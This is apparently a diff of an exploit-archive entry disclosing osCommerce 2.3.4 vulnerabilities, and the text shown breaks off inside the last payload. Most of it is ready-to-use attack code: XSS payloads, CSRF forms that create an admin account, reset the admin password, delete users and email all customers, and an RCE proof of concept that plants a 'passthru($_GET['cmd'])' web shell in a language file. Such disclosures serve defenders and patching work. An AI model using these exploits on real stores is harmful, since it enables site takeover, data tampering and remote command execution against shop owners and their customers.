securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">1</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">0.00</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
664
platforms/php/webapps/34582.txt
Executable file
664
platforms/php/webapps/34582.txt
Executable file
|
@ -0,0 +1,664 @@
|
|||
#Title: osCommerce 2.3.4 - Multiple vulnerabilities
|
||||
#Date: 10.07.14
|
||||
#Affected versions: => 2.3.4 (latest atm)
|
||||
#Vendor: oscommerce.com
|
||||
#Tested on: Apache 2.2.22 [at] Debian
|
||||
#Contact: smash [at] devilteam.pl
|
||||
|
||||
#Cross Site Scripting
|
||||
|
||||
1. Reflected XSS -> Send Email
|
||||
|
||||
Vulnerable parameters - customers_email_address & mail_sent_to
|
||||
|
||||
a) POST
|
||||
|
||||
Request:
|
||||
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
customers_email_address=<script>alert(666)</script>&from=fuck@shit.up&subject=test&message=test
|
||||
|
||||
Response:
|
||||
HTTP/1.1 200 OK
|
||||
(...)
|
||||
<td class="smallText"><strong>Customer:</strong><br /><script>alert(666)</script></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
CSRF PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview" method="POST">
|
||||
<input type="hidden" name="customers_email_address" value="<script>alert(666)</script>" />
|
||||
<input type="hidden" name="from" value="fuck@shit.up" />
|
||||
<input type="hidden" name="subject" value="test" />
|
||||
<input type="hidden" name="message" value="test" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
b) GET
|
||||
|
||||
Request:
|
||||
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="messageStackSuccess"><img src="images/icons/success.gif" border="0" alt="Success" title="Success" />&nbps;Notice: Email sent to: <script>alert(666)</script></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
|
||||
2. Persistent XSS via CSRF -> Newsletter
|
||||
|
||||
Request:
|
||||
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
module=newsletter&title=<script>alert(123)</script>&content=<script>alert(456)</script>
|
||||
|
||||
CSRF PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert" method="POST">
|
||||
<input type="hidden" name="module" value="newsletter" />
|
||||
<input type="hidden" name="title" value="<script>alert(123)</script>" />
|
||||
<input type="hidden" name="content" value="<script>alert(456)</script>" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
First popbox (123) will be executed whenever someone will visit newsletters page:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php
|
||||
|
||||
(...)
|
||||
<td class="dataTableContent"><a href="http://localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbps;<script>alert(123)</script></td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><strong><script>alert(123)</script></strong></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Second one, will be executed whenever someone will visit specific newsletter page:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview
|
||||
|
||||
(...)
|
||||
<tr>
|
||||
<td><tt><script>alert(456)</script></tt></td>
|
||||
</tr>
|
||||
<tr>
|
||||
(...)
|
||||
|
||||
3. Persistent XSS via CSRF -> Banner manager
|
||||
|
||||
Vulnerable parameter - banners_title
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
function go()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?action=insert", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19390593192018454503847724432");
|
||||
xhr.withCredentials = true;
|
||||
var body = "-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_title\"\r\n" +
|
||||
"\r\n" +
|
||||
"\x3cscript\x3ealert(666)\x3c/script\x3e\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_url\"\r\n" +
|
||||
"\r\n" +
|
||||
"url\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_group\"\r\n" +
|
||||
"\r\n" +
|
||||
"footer\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"new_banners_group\"\r\n" +
|
||||
"\r\n" +
|
||||
"group\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_image\"; filename=\"info.gif\"\r\n" +
|
||||
"Content-Type: application/x-php\r\n" +
|
||||
"\r\n" +
|
||||
"\x3c?php\n" +
|
||||
"phpinfo();\n" +
|
||||
"?\x3e\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_image_local\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_image_target\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"banners_html_text\"\r\n" +
|
||||
"\r\n" +
|
||||
"sup\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"date_scheduled\"\r\n" +
|
||||
"\r\n" +
|
||||
"2014-07-01\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"expires_date\"\r\n" +
|
||||
"\r\n" +
|
||||
"2014-07-31\r\n" +
|
||||
"-----------------------------19390593192018454503847724432\r\n" +
|
||||
"Content-Disposition: form-data; name=\"expires_impressions\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------19390593192018454503847724432--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Go" onclick="go();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visitd banner manager page or specific banner page.
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]
|
||||
|
||||
Response:
|
||||
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=3')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title="View Banner" /></a>&nbps;<script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">group</td>
|
||||
|
||||
|
||||
4. Persistent XSS via CSRF -> Locations / Taxes
|
||||
|
||||
Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&action=insert" method="POST">
|
||||
<input type="hidden" name="countries_name" value="AAAA<script>alert(666)</script>" />
|
||||
<input type="hidden" name="countries_iso_code_2" value="xs" />
|
||||
<input type="hidden" name="countries_iso_code_3" value="sed" />
|
||||
<input type="hidden" name="address_format_id" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visitd 'countries' tab:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=241&action=edit'">
|
||||
<td class="dataTableContent">AAAA<script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="center" width="40">xs</td>
|
||||
<td class="dataTableContent" align="center" width="40">sed</td>
|
||||
(...)
|
||||
|
||||
5. Persistent XSS via CSRF -> Localization
|
||||
|
||||
a) Currencies
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&action=insert" method="POST">
|
||||
<input type="hidden" name="cs" value="" />
|
||||
<input type="hidden" name="title" value="<script>alert(666)</script>" />
|
||||
<input type="hidden" name="code" value="666" />
|
||||
<input type="hidden" name="symbol_left" value="hm" />
|
||||
<input type="hidden" name="symbol_right" value="mh" />
|
||||
<input type="hidden" name="decimal_point" value="10" />
|
||||
<input type="hidden" name="thousands_point" value="100" />
|
||||
<input type="hidden" name="decimal_places" value="10000" />
|
||||
<input type="hidden" name="value" value="666"><script>alert(123)</script>" />
|
||||
<input type="hidden" name="default" value="on" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visit currencies tab:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=3&action=edit'">
|
||||
<td class="dataTableContent"><strong><script>alert(666)</script> (default)</strong></td>
|
||||
<td class="dataTableContent">666</td>
|
||||
<td class="dataTableContent" align="right">666.00000000</td>
|
||||
(...)
|
||||
|
||||
b) Languages
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?action=insert" method="POST">
|
||||
<input type="hidden" name="name" value=""><script>alert(666)</script>" />
|
||||
<input type="hidden" name="code" value="h3ll" />
|
||||
<input type="hidden" name="image" value="icon.gif" />
|
||||
<input type="hidden" name="directory" value="asdf" />
|
||||
<input type="hidden" name="sort_order" value="asdf" />
|
||||
<input type="hidden" name="default" value="on" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
JS will be executed whenever someone will visit langauges tab:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php?page=1&lID=2&action=edit'">
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent">66</td>
|
||||
(...)
|
||||
|
||||
c) Orders status
|
||||
|
||||
Request:
|
||||
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><strong>'>"><>XSS</strong></td>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt="<script>alert(666)</script>" title="<script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf'>"><>XSS/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/asdf/images/icon.gif'>"><>XSS" border="0" alt=""><script>alert(666)</script>" title=""><script>alert(666)</script>" />&nbps;'>"><>XSS<br /><img src="http://localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english/images/icon.gif" border="0" alt="English" title="English" />&nbps;'>"><>XSS</td>
|
||||
</tr>
|
||||
|
||||
|
||||
|
||||
#Boring CSRF
|
||||
|
||||
- Remove any item from cart
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product
|
||||
|
||||
- Add item to cart
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product
|
||||
|
||||
- Remove address book entry
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1
|
||||
|
||||
- Remove specific country
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm
|
||||
|
||||
- Remove specific currency
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm
|
||||
|
||||
- Change store credentials
|
||||
|
||||
I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF.
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php
|
||||
|
||||
...and a lot more.
|
||||
|
||||
|
||||
|
||||
#Less boring CSRF
|
||||
|
||||
- Send email as admin -> Send email
|
||||
|
||||
It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/mail.php?action=send_email_to_user" method="POST">
|
||||
<input type="hidden" name="customers_email_address" value="***" />
|
||||
<input type="hidden" name="from" value=""storeowner" <storemail@lol.lo>" />
|
||||
<input type="hidden" name="subject" value="subject" />
|
||||
<input type="hidden" name="message" value="sup" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
- Delete / Edit specific user
|
||||
|
||||
Remove user PoC:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
|
||||
|
||||
Edit user PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=update" method="POST">
|
||||
<input type="hidden" name="default_address_id" value="1" />
|
||||
<input type="hidden" name="customers_gender" value="m" />
|
||||
<input type="hidden" name="customers_firstname" value="juster" />
|
||||
<input type="hidden" name="customers_lastname" value="testing" />
|
||||
<input type="hidden" name="customers_dob" value="07/13/2004" />
|
||||
<input type="hidden" name="customers_email_address" value="szit@szit.szit" />
|
||||
<input type="hidden" name="entry_company" value="asdf" />
|
||||
<input type="hidden" name="entry_street_address" value="asdfasdf" />
|
||||
<input type="hidden" name="entry_suburb" value="asdfsdff" />
|
||||
<input type="hidden" name="entry_postcode" value="66-666" />
|
||||
<input type="hidden" name="entry_city" value="asdfasdf" />
|
||||
<input type="hidden" name="entry_state" value="asdfasdfasdf" />
|
||||
<input type="hidden" name="entry_country_id" value="5" />
|
||||
<input type="hidden" name="customers_telephone" value="123456792" />
|
||||
<input type="hidden" name="customers_fax" value="" />
|
||||
<input type="hidden" name="customers_newsletter" value="1" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
- Add / Edit / Delete admin
|
||||
|
||||
Add admin account:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?action=insert" method="POST">
|
||||
<input type="hidden" name="username" value="haxor" />
|
||||
<input type="hidden" name="password" value="pwned" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Change admin (set new password):
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=1&action=save" method="POST">
|
||||
<input type="hidden" name="username" value="admin" />
|
||||
<input type="hidden" name="password" value="newpass" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Remove admin:
|
||||
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm
|
||||
|
||||
|
||||
- RCE via CSRF -> Define Languages
|
||||
|
||||
It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included.
|
||||
|
||||
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
|
||||
|
||||
PoC:
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/define_language.php?lngdir=english&filename=english.php&action=save" method="POST">
|
||||
<input type="hidden" name="file_contents" value="<?php
|
||||
/*
|
||||
$Id$
|
||||
|
||||
osCommerce, Open Source E-Commerce Solutions
|
||||
http://www.oscommerce.com
|
||||
|
||||
Copyright (c) 2013 osCommerce
|
||||
|
||||
Released under the GNU General Public License
|
||||
*/
|
||||
|
||||
// look in your $PATH_LOCALE/locale directory for available locales
|
||||
// or type locale -a on the server.
|
||||
// Examples:
|
||||
// on RedHat try 'en_US'
|
||||
// on FreeBSD try 'en_US.ISO_8859-1'
|
||||
// on Windows try 'en', or 'English'
|
||||
@setlocale(LC_ALL, array('en_US.UTF-8', 'en_US.UTF8', 'enu_usa'));
|
||||
|
||||
define('DATE_FORMAT_SHORT', '%m/%d/%Y'); // this is used for strftime()
|
||||
define('DATE_FORMAT_LONG', '%A %d %B, %Y'); // this is used for strftime()
|
||||
define('DATE_FORMAT', 'm/d/Y'); // this is used for date()
|
||||
define('DATE_TIME_FORMAT', DATE_FORMAT_SHORT . ' %H:%M:%S');
|
||||
define('JQUERY_DATEPICKER_I18N_CODE', ''); // leave empty for en_US; see http://jqueryui.com/demos/datepicker/#localization
|
||||
define('JQUERY_DATEPICKER_FORMAT', 'mm/dd/yy'); // see http://docs.jquery.com/UI/Datepicker/formatDate
|
||||
|
||||
@passthru($_GET['cmd']);
|
||||
|
||||
////
|
||||
// Return date in raw format
|
||||
// $date should be in format mm/dd/yyyy
|
||||
// raw date is in format YYYYMMDD, or DDMMYYYY
|
||||
function tep_date_raw($date, $reverse = false) {
|
||||
if ($reverse) {
|
||||
return substr($date, 3, 2) . substr($date, 0, 2) . substr($date, 6, 4);
|
||||
} else {
|
||||
return substr($date, 6, 4) . substr($date, 0, 2) . substr($date, 3, 2);
|
||||
}
|
||||
}
|
||||
|
||||
// if USE_DEFAULT_LANGUAGE_CURRENCY is true, use the following currency, instead of the applications default currency (used when changing language)
|
||||
define('LANGUAGE_CURRENCY', 'USD');
|
||||
|
||||
// Global entries for the <html> tag
|
||||
define('HTML_PARAMS', 'dir="ltr" lang="en"');
|
||||
|
||||
// charset for web pages and emails
|
||||
define('CHARSET', 'utf-8');
|
||||
|
||||
// page title
|
||||
define('TITLE', STORE_NAME);
|
||||
|
||||
// header text in includes/header.php
|
||||
define('HEADER_TITLE_CREATE_ACCOUNT', 'Create an Account');
|
||||
define('HEADER_TITLE_MY_ACCOUNT', 'My Account');
|
||||
define('HEADER_TITLE_CART_CONTENTS', 'Cart Contents');
|
||||
define('HEADER_TITLE_CHECKOUT', 'Checkout');
|
||||
define('HEADER_TITLE_TOP', 'Top');
|
||||
define('HEADER_TITLE_CATALOG', 'Catalog');
|
||||
define('HEADER_TITLE_LOGOFF', 'Log Off');
|
||||
define('HEADER_TITLE_LOGIN', 'Log In');
|
||||
|
||||
// footer text in includes/footer.php
|
||||
define('FOOTER_TEXT_REQUESTS_SINCE', 'requests since');
|
||||
|
||||
// text for gender
|
||||
define('MALE', 'Male');
|
||||
define('FEMALE', 'Female');
|
||||
define('MALE_ADDRESS', 'Mr.');
|
||||
define('FEMALE_ADDRESS', 'Ms.');
|
||||
|
||||
// text for date of birth example
|
||||
define('DOB_FORMAT_STRING', 'mm/dd/yyyy');
|
||||
|
||||
// checkout procedure text
|
||||
define('CHECKOUT_BAR_DELIVERY', 'Delivery Information');
|
||||
define('CHECKOUT_BAR_PAYMENT', 'Payment Information');
|
||||
define('CHECKOUT_BAR_CONFIRMATION', 'Confirmation');
|
||||
define('CHECKOUT_BAR_FINISHED', 'Finished!');
|
||||
|
||||
// pull down default text
|
||||
define('PULL_DOWN_DEFAULT', 'Please Select');
|
||||
define('TYPE_BELOW', 'Type Below');
|
||||
|
||||
// javascript messages
|
||||
define('JS_ERROR', 'Errors have occured during the process of your form.\n\nPlease make the following corrections:\n\n');
|
||||
|
||||
define('JS_REVIEW_TEXT', '* The \'Review Text\' must have at least ' . REVIEW_TEXT_MIN_LENGTH . ' characters.\n');
|
||||
define('JS_REVIEW_RATING', '* You must rate the product for your review.\n');
|
||||
|
||||
define('JS_ERROR_NO_PAYMENT_MODULE_SELECTED', '* Please select a payment method for your order.\n');
|
||||
|
||||
define('JS_ERROR_SUBMITTED', 'This form has already been submitted. Please press Ok and wait for this process to be completed.');
|
||||
|
||||
define('ERROR_NO_PAYMENT_MODULE_SELECTED', 'Please select a payment method for your order.');
|
||||
|
||||
define('CATEGORY_COMPANY', 'Company Details');
|
||||
define('CATEGORY_PERSONAL', 'Your Personal Details');
|
||||
define('CATEGORY_ADDRESS', 'Your Address');
|
||||
define('CATEGORY_CONTACT', 'Your Contact Information');
|
||||
define('CATEGORY_OPTIONS', 'Options');
|
||||
define('CATEGORY_PASSWORD', 'Your Password');
|
||||
|
||||
define('ENTRY_COMPANY', 'Company Name:');
|
||||
define('ENTRY_COMPANY_TEXT', '');
|
||||
define('ENTRY_GENDER', 'Gender:');
|
||||
define('ENTRY_GENDER_ERROR', 'Please select your Gender.');
|
||||
define('ENTRY_GENDER_TEXT', '*');
|
||||
define('ENTRY_FIRST_NAME', 'First Name:');
|
||||
define('ENTRY_FIRST_NAME_ERROR', 'Your First Name must contain a minimum of ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_FIRST_NAME_TEXT', '*');
|
||||
define('ENTRY_LAST_NAME', 'Last Name:');
|
||||
define('ENTRY_LAST_NAME_ERROR', 'Your Last Name must contain a minimum of ' . ENTRY_LAST_NAME_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_LAST_NAME_TEXT', '*');
|
||||
define('ENTRY_DATE_OF_BIRTH', 'Date of Birth:');
|
||||
define('ENTRY_DATE_OF_BIRTH_ERROR', 'Your Date of Birth must be in this format: MM/DD/YYYY (eg 05/21/1970)');
|
||||
define('ENTRY_DATE_OF_BIRTH_TEXT', '* (eg. 05/21/1970)');
|
||||
define('ENTRY_EMAIL_ADDRESS', 'E-Mail Address:');
|
||||
define('ENTRY_EMAIL_ADDRESS_ERROR', 'Your E-Mail Address must contain a minimum of ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_EMAIL_ADDRESS_CHECK_ERROR', 'Your E-Mail Address does not appear to be valid - please make any necessary corrections.');
|
||||
define('ENTRY_EMAIL_ADDRESS_ERROR_EXISTS', 'Your E-Mail Address already exists in our records - please log in with the e-mail address or create an account with a different address.');
|
||||
define('ENTRY_EMAIL_ADDRESS_TEXT', '*');
|
||||
define('ENTRY_STREET_ADDRESS', 'Street Address:');
|
||||
define('ENTRY_STREET_ADDRESS_ERROR', 'Your Street Address must contain a minimum of ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_STREET_ADDRESS_TEXT', '*');
|
||||
define('ENTRY_SUBURB', 'Suburb:');
|
||||
define('ENTRY_SUBURB_TEXT', '');
|
||||
define('ENTRY_POST_CODE', 'Post Code:');
|
||||
define('ENTRY_POST_CODE_ERROR', 'Your Post Code must contain a minimum of ' . ENTRY_POSTCODE_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_POST_CODE_TEXT', '*');
|
||||
define('ENTRY_CITY', 'City:');
|
||||
define('ENTRY_CITY_ERROR', 'Your City must contain a minimum of ' . ENTRY_CITY_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_CITY_TEXT', '*');
|
||||
define('ENTRY_STATE', 'State/Province:');
|
||||
define('ENTRY_STATE_ERROR', 'Your State must contain a minimum of ' . ENTRY_STATE_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_STATE_ERROR_SELECT', 'Please select a state from the States pull down menu.');
|
||||
define('ENTRY_STATE_TEXT', '*');
|
||||
define('ENTRY_COUNTRY', 'Country:');
|
||||
define('ENTRY_COUNTRY_ERROR', 'You must select a country from the Countries pull down menu.');
|
||||
define('ENTRY_COUNTRY_TEXT', '*');
|
||||
define('ENTRY_TELEPHONE_NUMBER', 'Telephone Number:');
|
||||
define('ENTRY_TELEPHONE_NUMBER_ERROR', 'Your Telephone Number must contain a minimum of ' . ENTRY_TELEPHONE_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_TELEPHONE_NUMBER_TEXT', '*');
|
||||
define('ENTRY_FAX_NUMBER', 'Fax Number:');
|
||||
define('ENTRY_FAX_NUMBER_TEXT', '');
|
||||
define('ENTRY_NEWSLETTER', 'Newsletter:');
|
||||
define('ENTRY_NEWSLETTER_TEXT', '');
|
||||
define('ENTRY_NEWSLETTER_YES', 'Subscribed');
|
||||
define('ENTRY_NEWSLETTER_NO', 'Unsubscribed');
|
||||
define('ENTRY_PASSWORD', 'Password:');
|
||||
define('ENTRY_PASSWORD_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_PASSWORD_ERROR_NOT_MATCHING', 'The Password Confirmation must match your Password.');
|
||||
define('ENTRY_PASSWORD_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_CONFIRMATION', 'Password Confirmation:');
|
||||
define('ENTRY_PASSWORD_CONFIRMATION_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_CURRENT', 'Current Password:');
|
||||
define('ENTRY_PASSWORD_CURRENT_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_CURRENT_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_PASSWORD_NEW', 'New Password:');
|
||||
define('ENTRY_PASSWORD_NEW_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_NEW_ERROR', 'Your new Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_PASSWORD_NEW_ERROR_NOT_MATCHING', 'The Password Confirmation must match your new Password.');
|
||||
define('PASSWORD_HIDDEN', '--HIDDEN--');
|
||||
|
||||
define('FORM_REQUIRED_INFORMATION', '* Required information');
|
||||
|
||||
// constants for use in tep_prev_next_display function
|
||||
define('TEXT_RESULT_PAGE', 'Result Pages:');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> products)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> orders)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> reviews)');
|
